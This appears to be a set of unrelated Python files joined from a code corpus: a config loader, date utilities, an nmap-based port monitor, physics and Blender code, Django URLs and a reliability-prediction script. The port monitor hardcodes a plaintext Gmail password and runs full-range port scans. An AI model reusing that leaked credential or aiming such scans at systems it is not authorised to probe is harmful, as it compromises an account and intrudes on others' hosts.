ConfigIni(ConfigBase):\n \"\"\"\n Wrapper around ConfigParser to deal with Django environment settings.\n \"\"\"\n SECTION = 'settings'\n\n def __init__(self, config_file):\n self.config_file = None\n self.parser = None\n self.load(config_file)\n\n def load(self, config_file):\n \"\"\"\n Load config data from a file.\n \"\"\"\n self.config_file = config_file\n self.parser = ConfigParser()\n self.parser.readfp(open(config_file))\n\n def get(self, option, default=string_empty, cast=string_type):\n \"\"\"\n Return the value for option or default option is not defined.\n \"\"\"\n if not self.parser.has_option(self.SECTION, option):\n return cast(default)\n\n getter = {\n bool: self.parser.getboolean,\n float: self.parser.getfloat,\n int: self.parser.getint,\n }.get(cast, self.parser.get)\n\n return cast(getter(self.SECTION, option))\n\n def set(self, option, value):\n \"\"\"\n Add a config value to configuration instance.\n \"\"\"\n if not self.parser.has_section(self.SECTION):\n self.parser.add_section(self.SECTION)\n\n self.parser.set(self.SECTION, option, string_type(value))\n\n def remove(self, option):\n \"\"\"\n Remove an option from the config instance.\n 
\"\"\"\n        return self.parser.remove_option(self.SECTION, option)\n\n    def list(self):\n        \"\"\"\n        Return a list of all (option, value) pairs.\n        \"\"\"\n        return self.parser.items(self.SECTION)\n\n    def save(self):\n        \"\"\"\n        Persist current configuration instance to the original config file.\n        \"\"\"\n        with open(self.config_file, 'w') as f:\n            self.parser.write(f)\n\n\nclass ConfigEnv(ConfigBase):\n    \"\"\"\n    Handle .env file format used by Foreman.\n    \"\"\"\n    _BOOLEANS = {'1': True, 'yes': True, 'true': True, 'on': True,\n                 '0': False, 'no': False, 'false': False, 'off': False}\n\n    def __init__(self, config_file):\n        self.data = self._read_dotenv(config_file)\n\n    def _read_dotenv(self, config_file):\n        \"\"\"\n        Read config data from a file. Taken from jacobian's django-dotenv\n        \"\"\"\n        data = {}\n        for line in open(config_file):\n            line = line.strip()\n            if not line or line.startswith('#') or '=' not in line:\n                continue\n            k, v = line.split('=', 1)\n            v = v.strip(\"'\").strip('\"')\n            data[k] = v\n        return data\n\n    def _cast_boolean(self, value):\n        \"\"\"\n        Helper to convert config values to boolean as ConfigParser does.\n        \"\"\"\n        if value.lower() not in self._BOOLEANS:\n            raise ValueError('Not a boolean: %s' % value)\n\n        return self._BOOLEANS[value.lower()]\n\n    def get(self, option, default=string_empty, cast=string_type):\n        \"\"\"\n        Return the value for option, or default if option is not defined.\n        \"\"\"\n        if option not in self.data and \\\n                option not in os.environ:\n            # If default was not defined return it, else make sure to cast.\n            # This is useful for cases like dj-database-url.parse.\n            if default == string_empty:\n                return default\n            else:\n                return cast(default)\n\n        if cast is bool:\n            cast = self._cast_boolean\n\n        return cast(self.data.get(option) or os.environ[option])\n\n\nclass AutoConfig(object):\n    \"\"\"\n    Autodetects the config file and type.\n    \"\"\"\n    SUPPORTED = {\n        'settings.ini': ConfigIni,\n        '.env': ConfigEnv,\n    }\n\n    def __init__(self):\n        self.config = None\n\n    def _find_file(self, path):\n        # look for all files in the current path\n        for filename in self.SUPPORTED:\n            file = os.path.join(path, filename)\n            if os.path.exists(file):\n                return file\n\n        # search the parent\n        parent = os.path.dirname(path)\n        if parent and parent != os.path.sep:\n            return self._find_file(parent)\n\n        # reached root without finding any files.\n        raise RuntimeError(\"No supported config file found.\")\n\n    def _load(self, path):\n        file = self._find_file(path)\n        klass = self.SUPPORTED.get(os.path.basename(file))\n        self.config = klass(file)\n\n    def _caller_path(self):\n        # MAGIC! 
Get the caller's module path.\n frame = sys._getframe()\n path = os.path.dirname(frame.f_back.f_back.f_code.co_filename)\n return path\n\n def __call__(self, *args, **kwargs):\n if not self.config:\n self._load(self._caller_path())\n\n return self.config(*args, **kwargs)\n\n\n# A pré-instantiated AutoConfig to improve decouple's usability\n# now just import config and start using with no configuration.\nconfig = AutoConfig()\n","sub_path":"venv/lib/python3.6/site-packages/decouple.py","file_name":"decouple.py","file_ext":"py","file_size_in_byte":5677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"640498723","text":"import math\nimport datetime as dt\nimport numbers\n\n\ndef is_a_digit(char):\n \"\"\"\n Check if the provided character is a digit.\n Returns a boolean result.\n \"\"\"\n if (char == '0' or char == '1'\n or char == '2' or char == '3'\n or char == '4' or char == '5'\n or char == '6' or char == '7'\n or char == '8' or char == '9'):\n return True\n else:\n return False\n\n\ndef first_non_digit(string):\n \"\"\"\n Finds the first non-digit character in the provided string.\n Returns the location and the char.\n \"\"\"\n for i in range(len(string)):\n if not is_a_digit(string[i]):\n return [i, string[i]]\n return [-1, ' ']\n\n\ndef parse_date(datestring):\n \"\"\"\n Parses a date string into a datetime object.\n It expects no more than 2 digits for the day, and uses this\n to determine whether the format is dmy or ymd. The delimit\n character is automatically determined.\n Returns the datetime or None.\n \"\"\"\n [delimit_loc, delimit_char] = first_non_digit(datestring)\n if (delimit_loc < 3):\n formatter = \"%d\" + delimit_char + \"%m\" + delimit_char + \"%Y\"\n else:\n formatter = \"%Y\" + delimit_char + \"%m\" + delimit_char + \"%d\"\n answer = dt.datetime.strptime(datestring, formatter)\n return answer\n\n\ndef parse_value(valuestring):\n \"\"\"\n Parses a string to a float value. Whitespaces are parsed as nan.\n Returns a float.\n \"\"\"\n s = valuestring.strip()\n if (s == \"\"):\n s = \"nan\"\n return float(s)\n\n\ndef is_data_row(row):\n \"\"\"\n Guesses if a csvreader 'row' object contains data, i.e. not\n headder information. It does this by checking if the zeroth\n char of the zeroth element is a digit (which would be a date).\n Returns boolean result.\n \"\"\"\n if (not row or len(row) == 0):\n return False\n zeroth_element = row[0]\n if (len(zeroth_element) == 0):\n return False\n else:\n zeroth_char = zeroth_element[0]\n return is_a_digit(zeroth_char)\n\n\ndef count_missing(data):\n \"\"\"\n Counts the number of nan in a list of float.\n Return an integer.\n \"\"\"\n answer = 0\n for d in data:\n if math.isnan(d):\n answer = answer + 1\n return answer\n\n\ndef period_length(start_datetime, end_datetime, interval=dt.timedelta(1)):\n \"\"\"\n Calculates the number of intervals (default interval = 1 day) between\n two datetimes. The function returns the number of days as a float, which\n may be non-integer and/or negative.\n \"\"\"\n answer = (end_datetime - start_datetime) / interval\n return answer\n\n\ndef days_in_month(year, month):\n \"\"\"\n Calculates the number of days in a month. 
This is a bit hacky but doesn't\n require any new libraries and it works.\n \"\"\"\n date1 = dt.datetime(year, month, 1)\n date2 = None\n if month == 12:\n date2 = dt.datetime(year + 1, 1, 1)\n else:\n date2 = dt.datetime(year, month + 1, 1)\n answer = (date2 - date1).days\n return answer\n\n\ndef last_day_in_month(date):\n \"\"\"\n Returns a datetime set to the last day in the month\n \"\"\"\n x = days_in_month(date.year, date.month)\n answer = dt.datetime(date.year, date.month, x)\n return answer\n\n\ndef is_a_number(var):\n \"\"\"\n Tests if a variable is an instance of a numberself (i.e. int, float, etc)\n \"\"\"\n answer = isinstance(var, numbers.Number)\n return answer\n","sub_path":"pixiepython/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"558586226","text":"#!/usr/bin/env python3\n#./portmonitor.py 204.186.249.254 c20849936594ac95485e908ac9b984665ddd6aa6bbf616f4bbb8b6d5d10f915 mrjackson@gmail.com\nimport nmap #pip3 install python-nmap\nimport hashlib\nimport sys\nimport logging\nfrom logging.handlers import RotatingFileHandler\nfrom datetime import datetime\nfrom datetime import timedelta\n\nlogger = logging.getLogger(\"Rotating Log\")\nlogger.setLevel(logging.DEBUG)\nhandler = RotatingFileHandler(filename=\"/home/mrjackson/log/portmonitor.log\", maxBytes=1048576, backupCount=1)\nlogger.addHandler(handler)\nlogger.info(\"Script started: \" + str(datetime.now()) + \" -- Arguments -- \" + str(sys.argv[1:]))\nstarttime = str(datetime.now())\n\n\ntry:\n\thostip = str(sys.argv[1])\n\thash = str(sys.argv[2])\n\tcontact = str(sys.argv[3])\nexcept Exception as e:\n\tlogger.error(\"Script Failed: \" + str(datetime.now()) + \" -- Arguments Error -- \" + str(e))\n\tsys.exit(1)\n\n\ndef hash_string(string):\n\t#Return a SHA-256 hash of the given string\n\treturn hashlib.sha256(string.encode('utf-8')).hexdigest()\n\ndef sendalertmail(hostip,hash,porthash,portscan,recipient,starttime,endtime,subject):\n\t#print(hostip,hash,porthash)\n\timport smtplib\n\tfrom email.mime.multipart import MIMEMultipart\n\tfrom email.mime.text import MIMEText\n\n\tgmailUser = 'misterjackson.house@gmail.com'\n\tgmailPassword = 'bj002983mh1'\n#\trecipient = 'misterjackson.house@gmail.com'\n\tmessage=\"External Port Monitoring \\n\\n\" + hostip + \"\\nGood Hash: \" + hash + \"\\nCurrent Hash: \" + porthash + \" \\n\\n\" + portscan \\\n\t\t + \" \\n\\nStartTime: \" + starttime + \" \\nEndTime: \" + endtime\n\n\tmsg = MIMEMultipart()\n\tmsg['From'] = gmailUser\n\tmsg['To'] = recipient\n\tmsg['Subject'] = subject\n\tmsg.attach(MIMEText(message))\n\n\tmailServer = smtplib.SMTP('smtp.gmail.com', 587)\n\tmailServer.ehlo()\n\tmailServer.starttls()\n\tmailServer.ehlo()\n\tmailServer.login(gmailUser, gmailPassword)\n\tmailServer.sendmail(gmailUser, recipient, msg.as_string())\n\tmailServer.close()\n\ntry:\n\tnm = nmap.PortScanner()\n\tnm.scan(hosts=hostip, arguments='-Pn -r -p 1-65535 --scan-delay 15ms')\n\tfor host in nm.all_hosts():\n\t\tportscan = ('----------------------------------------------------\\n')\n\t\tportscan = portscan + ('Host : %s (%s)' % (host, nm[host].hostname())) + \"\\n\"\n\t\tportscan = portscan + ('State : %s' % nm[host].state()) + \"\\n\"\n\t\tfor proto in nm[host].all_protocols():\n\t\t\tportscan = portscan + ('----------') + \"\\n\"\n\t\t\tportscan = portscan + ('Protocol : %s' % proto) + \"\\n\"\n\n\t\t\tlport = nm[host][proto].keys()\n\t\t\t#lport.sort()\n\t\t\tfor 
port in lport:\n\t\t\t\tportscan = portscan + ('port : %s\\tstate : %s' % (port, nm[host][proto][port]['state'])) + \"\\n\"\n\t#print(portscan)\n\tporthash = hash_string(portscan)\n#\tprint(porthash)\n\n\tif (porthash != hash):\n\t\t#print(\"hash failed\")\n\t\tsubject = \"ALERT: External Port Monitoring \" + host\n#\t\tsendalertmail(hostip,hash,porthash,portscan,contact)\n\telse:\n\t\tsubject = \"INFO: External Port Monitoring \" + host\n\n\tlogger.info(portscan)\n\tlogger.info(\"Script finished: \" + str(datetime.now()) + \" -- \" + hostip + \" -- \" + porthash)\n\nexcept Exception as e:\n\tlogger.error(\"Script Failed: \" + str(datetime.now()) + \" -- Run Test -- \" + str(e))\n\tsys.exit(1)\n\nendtime = str(datetime.now())\nsendalertmail(hostip,hash,porthash,portscan,contact,starttime,endtime,subject)\n\n#print(portscan)\n#porthash = hash_string(portscan)\n#print(porthash)\n","sub_path":"portmonitor.py","file_name":"portmonitor.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"301153635","text":"'''\n找出字符串中的最长子串的长度\n'''\n\n# 最长子字符串\ndef lengthOfLongestSubstring(s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if len(s) <= 1:\n return len(s)\n a = []\n b = []\n for i in range(len(s)):\n a.append(s[i])\n for j in range(i+1, len(s)):\n if s[j] not in a:\n a.append(s[j])\n else:\n break\n b.append(a)\n a = []\n\n return max([len(x) for x in b])\nprint(lengthOfLongestSubstring('pwwkesiuhtgeirhpwijdkjdlkfnnlk2304920-35980945'))","sub_path":"第三题.py","file_name":"第三题.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"48811153","text":"import tensorflow as tf\n\nimport common\n\n\"\"\"\nCalculates the LJ potential force on particles\n pos: Tensor containing the position of particles in the shape [[x,y,z]]\n edges_half: Edges of the simulation box as a tensor in shape [x,y,z], divided by two\n neg_edges_half: Negation of Tensor `edges_half`\n edges: Edges of the simulation box as a tensor in shape [x,y,z]\n forces_zeroes_tf: A Tensor of all zeroes that matches shape with `pos`\n ljatom_diameter_tf: Tensor containing diameters of the particles, must match positions with `pos`\n\"\"\"\ndef lj_force(pos, edges_half, neg_edges_half, edges, forces_zeroes_tf, ljatom_diameter_tf):\n with tf.name_scope(\"lj_force\"):\n distances = tf.compat.v1.vectorized_map(fn=lambda atom_pos: pos - atom_pos, elems=pos)\n distances = tf.compat.v1.where_v2(distances > edges_half, distances - edges, distances, name=\"where_edges_half\")\n distances = tf.compat.v1.where_v2(distances < neg_edges_half, distances + edges, distances, name=\"where_neg_edges_half\")\n magnitude = common.magnitude(distances)\n twelve = tf.math.pow(ljatom_diameter_tf, 12.0, name=\"diam_12_pow\") / tf.math.pow(magnitude, 12.0, name=\"mag_12_pow\")\n six = tf.math.pow(ljatom_diameter_tf, 6.0, name=\"diam_6_pow\") / tf.math.pow(magnitude, 6.0, name=\"mag_6_pow\")\n mag_squared = 1.0 / tf.math.pow(magnitude,2, name=\"mag_sqr_pow\")\n slice_forces = distances * (48.0 * 1.0 * (((twelve - 0.5 * six) * mag_squared)))\n # handle case distances pos - atom_pos == 0, causing inf and nan to appear in that position\n # can't see a way to remove that case in all above computations, easier to do it all at once at the end\n filter = tf.math.logical_or(tf.math.is_nan(slice_forces), magnitude < (ljatom_diameter_tf*2.5), name=\"or\")\n filtered = 
tf.compat.v1.where_v2(filter, forces_zeroes_tf, slice_forces, name=\"where_or\")\n forces = tf.math.reduce_sum(filtered, axis=0)\n return forces","sub_path":"many_particle/tf_ordinary_verlet/forces.py","file_name":"forces.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"126865068","text":"from django.conf.urls import url, include\n\nfrom . import views\n\n\nurlpatterns = [\n url(r'^adjustments/', include([\n url(r'^$', views.StockAdjustmentList.as_view(), name='stock-adjustment-list'),\n url(r'^create/$', views.StockAdjustmentCreate.as_view(), name='stock-adjustment-create'),\n url(r'^(?P<pk>[0-9]+)/', include([\n url(r'^$', views.StockAdjustmentDetail.as_view(), name='stock-adjustment-detail'),\n url(r'^update/$', views.StockAdjustmentUpdate.as_view(), name='stock-adjustment-update'),\n url(r'^delete/$', views.StockAdjustmentDelete.as_view(), name='stock-adjustment-delete'),\n ])),\n ])),\n url(r'^purchase_orders/', include([\n url(r'^$', views.PurchaseOrderList.as_view(), name='purchase-order-list'),\n url(r'^create/$', views.PurchaseOrderCreate.as_view(), name='purchase-order-create'),\n url(r'^(?P<pk>[0-9]+)/', include([\n url(r'^$', views.PurchaseOrderDetail.as_view(), name='purchase-order-detail'),\n url(r'^update/$', views.PurchaseOrderUpdate.as_view(), name='purchase-order-update'),\n url(r'^delete/$', views.PurchaseOrderDelete.as_view(), name='purchase-order-delete'),\n url(r'^shipment/$', views.POStockAdjustmentCreate.as_view(), name='po-stock-create'),\n url(r'^invoice/$', views.POInvoiceCreate.as_view(), name='po-invoice-create'),\n url(r'^reconcile/$', views.PurchaseOrderReconcile.as_view(), name='purchase-order-reconcile'),\n ])),\n ])),\n url(r'^invoices/', include([\n url(r'^$', views.InvoiceList.as_view(), name='invoice-list'),\n url(r'^create/$', views.InvoiceCreate.as_view(), name='invoice-create'),\n url(r'^(?P<pk>[0-9]+)/', include([\n url(r'^$', views.InvoiceDetail.as_view(), name='invoice-detail'),\n url(r'^update/$', views.InvoiceUpdate.as_view(), name='invoice-update'),\n url(r'^delete/$', views.InvoiceDelete.as_view(), name='invoice-delete'),\n ])),\n ])),\n url(r'^locations/', include([\n url(r'^store/$', views.StoreList.as_view(), name='store-list'),\n url(r'^store/(?P<pk>[0-9]+)/$', views.StoreDetail.as_view(), name='store-detail'),\n url(r'^warehouse/$', views.WarehouseList.as_view(), name='warehouse-list'),\n url(r'^warehouse/(?P<pk>[0-9]+)/', include([\n url(r'^$', views.WarehouseDetail.as_view(), name='warehouse-detail'),\n url(r'^setting$', views.WarehouseSetting.as_view(), name='warehouse-setting'),\n ])),\n ])),\n]\n","sub_path":"inventory/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"35039711","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 26 14:07:44 2017\n\n@author: justinwu\n\"\"\"\nfor i in range(8,19):\n if(i%2==1):\n continue\n print(\"i的值:\",i)","sub_path":"for_a.py","file_name":"for_a.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"154313578","text":"'''\nCopyright (C) 2015 CG Cookie\nhttp://cgcookie.com\nhello@cgcookie.com\n\nCreated by Jonathan Denning, Jonathan Williamson, and Patrick Moore\n\n This program is free software: you can redistribute it and/or modify\n it under the 
terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see <http://www.gnu.org/licenses/>.\n'''\n\nimport bpy\nimport bgl\nfrom bpy_extras.view3d_utils import location_3d_to_region_2d, region_2d_to_vector_3d\nfrom bpy_extras.view3d_utils import region_2d_to_location_3d, region_2d_to_origin_3d\nfrom mathutils import Vector, Matrix\nimport math\n\nfrom ..lib import common_utilities\nfrom ..lib.common_utilities import bversion, get_object_length_scale, dprint, frange, selection_mouse, showErrorMessage\nfrom ..lib.classes.profiler.profiler import Profiler\n\nclass loopslide_UI_Modal():\n\n def modal_wait(self, context, eventd):\n settings = common_utilities.get_settings()\n if eventd['press'] in self.keymap['confirm']:\n self.create_mesh(eventd['context'])\n return 'finish'\n\n if eventd['press'] in self.keymap['cancel']:\n return 'cancel'\n\n #####################################\n # General\n\n if eventd['press'] == 'LEFTMOUSE':\n if len(self.loopslide.vert_loop_vs) > 0:\n #print('SLIDE')\n return 'slide'\n \n elif eventd['type'] == 'MOUSEMOVE': #mouse movement/hovering\n #update brush and brush size\n self.hover_edge_pick(context,eventd,settings)\n return ''\n return ''\n \n def modal_slide(self,context,eventd):\n settings = common_utilities.get_settings()\n if eventd['press'] in self.keymap['action'] or eventd['press'] in self.keymap['confirm']:\n self.loopslide.calc_snaps(self.trg_bme, snap = True)\n self.loopslide.move_loop(self.trg_bme)\n self.loopslide.clear()\n return 'main'\n \n elif eventd['type'] in self.keymap['cancel'] | self.keymap['modal cancel']:\n self.loopslide.clear()\n return 'main'\n \n elif eventd['type'] == 'MOUSEMOVE':\n \n self.slide_update(context,eventd, settings)\n return ''\n ","sub_path":"op_loopslide/loopslide_ui_modal.py","file_name":"loopslide_ui_modal.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"93161359","text":"import SRMtool\nimport DT_WSE\nimport math,sys,time,random,xlsxwriter,copy\nimport numpy as np\nfrom scipy.optimize import minimize\n\n# 设置任务名\ntaskName = 'DS1_pre'\n# 设置待处理的数据\nfileName = 'C:\\\\xampp\\\\htdocs\\\\DS4.txt'\n# 设置参数文件\nparaFileName = 'C:\\\\xampp\\\\htdocs\\\\multi_para1.txt'\n\n# 设置Task所需依赖包\nlibFiles = ('SRMtool','DT_WSE')\n\n# 设置结果保存excel表的所有工作簿的名称元组\nworkbookNames = ('PredictionResult_3','PredictionStudy_3','PredictionResult_5','PredictionStudy_5','PredictionResult_7','PredictionStudy_7')\n\n# 设置每个工作簿内的列名元组\nPredictionResult_3 = ()\nPredictionStudy_3 = ('MSE1','MSE2','weightMethods','costMethods','costDataMethods','thresholdMethods','thresholdRules','dataTransforms','predictionIntervals','vares','bandwidth','fullName')\nPredictionResult_5 = ()\nPredictionStudy_5 = PredictionStudy_3\nPredictionResult_7 = ()\nPredictionStudy_7 = PredictionStudy_3\n# 将每个工作簿内的列名元组汇总为一个元组\nworkbookRawNames = (PredictionResult_3,PredictionStudy_3,PredictionResult_5,PredictionStudy_5,PredictionResult_7,PredictionStudy_7)\n\n#读取数据文件方法\ndef readDataFunction(dataFile):\n\to_data = 
SRMtool.getData(dataFile)\n\treturn (tuple(o_data),)\n\n#读取参数文件方法\ndef readParaFunction(ParaFile):\n\tparaTuple = SRMtool.multi_ReadParaFunction(ParaFile)\n\treturn paraTuple\n\n#Task方法\ndef taskFunction(dataTuple,paraTuple):\n\t#print(\"taskFunction6\")\n\t# 读取参数\n\tweightMethod = paraTuple[0]\n\tcostMethod = paraTuple[1]\n\tcostDataMethod = paraTuple[2]\n\tthresholdMethod = paraTuple[3]\n\tthresholdRule = paraTuple[4]\n\tdataTransform = paraTuple[5]\n\tpredictionInterval = paraTuple[6]\n\tvar = paraTuple[7]\n\t# 预准备,分割数据\n\to_data = list(dataTuple)\n\tgroupLength = len(o_data);\n\tpredictionPoint = math.floor(groupLength * predictionInterval);\n\tahead_data = o_data[0: predictionPoint];\n\tafter_data = o_data[predictionPoint: groupLength];\n\t# 开始计算\n\th = 1.1\n\tif(weightMethod == 'none'):\n\t\th = -1;\n\tif(dataTransform == 'TranslationInvariant'):\n\t\tvar = -1;\n\tresult = DT_WSE.costPrediction(ahead_data,costMethod,costDataMethod,weightMethod,h,groupLength - predictionPoint,dataTransform,thresholdRule,thresholdMethod,var);\n\t'''\n\t#加强版\n\tif(dataTransform == 'TranslationInvariant' and thresholdMethod == 'ut') or (dataTransform != 'TranslationInvariant' and thresholdMethod == 'ldt'):\n\t\tpass\n\telse:\n\t\tresult1 = result[predictionPoint: groupLength];\n\t\ti = 0;\n\t\tx0list = [] ## 空列表\n\t\twhile i < len(result1):\n\t\t\tx0list.append(result1[i])\n\t\t\ti = i + 1\n\t\tx0 = np.array(x0list)\n\t\targ = (ahead_data,'Fisz',thresholdRule,'ut','none',h,var)\n\t\tres = minimize(DT_WSE.prediction_cost3, x0,arg,method='nelder-mead',\n\t\t options={'xatol': 1e-8, 'disp': False})\n\t\ti = 0;\n\t\tfor re in res.x:\n\t\t\tresult[predictionPoint + i] = re;\n\t\t\ti = i + 1\n\t'''\n\t#分析结果\n\tahead = result[0 : predictionPoint];\n\tafter_result = result[predictionPoint: groupLength];\n\tparameterCombination = \"PredictionInterval:\"+str(predictionInterval)+\" \"+costMethod+\"_\"+costDataMethod+\"_\"+dataTransform+\"_\"+weightMethod+\"_\"+thresholdRule+\"_\"+thresholdMethod+\"_var=\"+str(var)+\"_h=\"+str(h)\n\tmse1 = SRMtool.MSE(after_data,after_result);\n\tmse2 = SRMtool.MSE(SRMtool.toCulData(after_data),SRMtool.toCulData(after_result));\n\tPredictionStudyTuple = (mse1,mse2)+paraTuple+(h,parameterCombination)\n\tPredictionResultTuple = (result,parameterCombination)\n\treturn (PredictionResultTuple,PredictionStudyTuple,predictionInterval)\n\n#结果保存方法\ndef saveFunction(taskResultTuple):\n\t#保存分析结果(接TaskFunction)\n\tpredictionInterval = taskResultTuple[2]\n\tif(predictionInterval == 0.3):\n\t\tworkbookNum = 0\n\tif(predictionInterval == 0.5):\n\t\tworkbookNum = 1\n\tif(predictionInterval == 0.7):\n\t\tworkbookNum = 2\n\t#第二个参数为False时,表示写入一列数据(从第一列起,纵向写入),此时需指定列名.应由第四个元素给出.\n\tPredictionResultTuple = (workbookNum * 2,False,taskResultTuple[0][0],taskResultTuple[0][1])\n\t#第二个参数为True时,表示写入一行数据(从第二行开始写起,不用指定列名)\n\tPredictionStudyTuple = (workbookNum * 2 + 1,True,taskResultTuple[1])\n\n\tthresholdMethod = taskResultTuple[1][5]\n\tdataTransform = taskResultTuple[1][7]\n\t#print(thresholdMethod+\" \"+dataTransform)\n\tif(dataTransform == 'TranslationInvariant' and thresholdMethod == 'ut') or (dataTransform != 'TranslationInvariant' and thresholdMethod == 'ldt'):\n\t\t#print(\"违法的组合\")\n\t\treturn ()\n\treturn (PredictionResultTuple,PredictionStudyTuple)\n\n#若不满意系统提供的结果保存框架或其他,亦可自行处理\ndef finialCust(excelFileName,taskResultTuples):\n\t#print(\"这里是finalCust\")\n\t# 设定数据集名称\n\tdataName = \"DS6\"\n\tmodelName = \"q1N\"\n\t# 创建excel文件\n\tdesktop_path = sys.path[0]+\"/excel_save/\"\n\tfileName = 
\"汇总All_\"+excelFileName +'_'+str(int(time.time()))+str(random.randint(0,9999))+ \".xlsx\"\n\tdesktop_path = desktop_path + fileName;\n\tworkbook = xlsxwriter.Workbook(desktop_path)\n\tworksheet = workbook.add_worksheet(\"AllPara\")\n\tmse_format = workbook.add_format({\n 'align': 'center', # 水平对齐方式\n 'valign': 'vcenter', # 垂直对齐方式\n })\n\tcell_format = workbook.add_format({\n 'align': 'center', # 水平对齐方式\n 'valign': 'vcenter', # 垂直对齐方式\n 'num_format': '0%'\n })\n\n\tbookNames = ('weightMethods','costMethods','costDataMethods','thresholdMethods','thresholdRules','dataTransforms','vares')\n\tparaLists = []\n\ti = 0 # 控制内循环中计算第i项参数的最小mse值\n\tj = 0 # 控制外循环中记录到了第j行\n\tfor bookName in bookNames:\n\t\tnameList = []\n\t\tminValueList = []\n\t\t#paraList = dict()\n\t\tparaList = []\n\t\t# 跳过第七项,因为第七项是predictionInterval\n\t\tif(i == 6):\n\t\t\ti = 7\n\t\tpreList = []\n\t\t# 重组数据\n\t\tfor taskResultTuple in taskResultTuples:\n\t\t\tparaTuple = taskResultTuple[1]\n\t\t\tmse2 = paraTuple[1]\n\t\t\t# 读取参数\n\t\t\tweightMethod = paraTuple[0+2]\n\t\t\tcostMethod = paraTuple[1+2]\n\t\t\tcostDataMethod = paraTuple[2+2]\n\t\t\tthresholdMethod = paraTuple[3+2]\n\t\t\tthresholdRule = paraTuple[4+2]\n\t\t\tdataTransform = paraTuple[5+2]\n\t\t\tpredictionInterval = paraTuple[6+2]\n\t\t\tvar = paraTuple[7+2]\n\t\t\t# 排除非法参数组合\n\t\t\tif(dataTransform == 'TranslationInvariant' and thresholdMethod == 'ut') or (dataTransform != 'TranslationInvariant' and thresholdMethod == 'ldt'):\n\t\t\t\tcontinue \n\t\t\tdictPara = dict()\n\t\t\tdictPara[\"para\"] = paraTuple[i+2]\n\t\t\tdictPara[\"predictionPoint\"] = predictionInterval\n\t\t\tdictPara[\"mse\"] = mse2\n\t\t\tparaList.append(dictPara)\n\n\t\t# 记录参数名\n\t\t# worksheet.write(j,0,bookName);\n\t\tmergeStr = 'A'+str(j+1)+':'+'E'+str(j+1)\n\t\tworksheet.merge_range(mergeStr, bookName, mse_format)\n\t\t# 对数据进行排序\n\t\tprint(str(taskResultTuples[0][1][i+2])+\" 开始排序\")\n\t\tl = sorted(paraList, key=lambda x:(x['predictionPoint'], x['para'], x['mse']))\n\t\tcol = 0\n\t\traw = 1\n\t\tnowPredictionPoint = l[0][\"predictionPoint\"]\n\t\tnowPara = l[0][\"para\"]\n\t\tworksheet.write(j+1,2+col,nowPredictionPoint,cell_format)\n\t\tworksheet.write(j+1+raw,2+col,l[0][\"mse\"],mse_format)\n\t\tworksheet.write(j+1+raw,1,l[0][\"para\"],mse_format)\n\t\tworksheet.write(j+1+raw,0,dataName,mse_format)\n\t\tfor x in l:\n\t\t\tif(x[\"predictionPoint\"] != nowPredictionPoint):\n\t\t\t\tnowPara = x[\"para\"]\n\t\t\t\tnowPredictionPoint = x[\"predictionPoint\"]\n\t\t\t\tcol = col + 1\n\t\t\t\traw = 1\n\t\t\t\tworksheet.write(j+1,2+col,nowPredictionPoint,cell_format)\n\t\t\t\tworksheet.write(j+1+raw,2+col,x[\"mse\"],mse_format)\n\t\t\t\t#worksheet.write(j+1+raw,1,x[\"para\"],mse_format)\n\t\t\telif(x[\"para\"] != nowPara):\n\t\t\t\tnowPara = x[\"para\"]\n\t\t\t\traw = raw + 1\n\t\t\t\t#print(str(j+1+raw)+\",\"+str(2+col)+\":\"+str(x[\"mse\"]))\n\t\t\t\tworksheet.write(j+1+raw,2+col,x[\"mse\"],mse_format)\n\t\t\t\tworksheet.write(j+1+raw,1,x[\"para\"],mse_format)\n\t\tj = j + raw + 3\n\t\ti = i + 1\n\t# 记录所有组合中的最好成绩\n\t# 记录参数名\n\t# worksheet.write(j,0,bookName);\n\tmergeStr = 'A'+str(j+1)+':'+'E'+str(j+1)\n\tworksheet.merge_range(mergeStr, 'BestMSE', mse_format)\n\t# 对数据进行排序\n\tprint(\"最好成绩排序\")\n\tl = sorted(paraList, key=lambda x:(x['predictionPoint'], x['mse']))\n\tcol = 0\n\traw = 1\n\tnowPredictionPoint = 
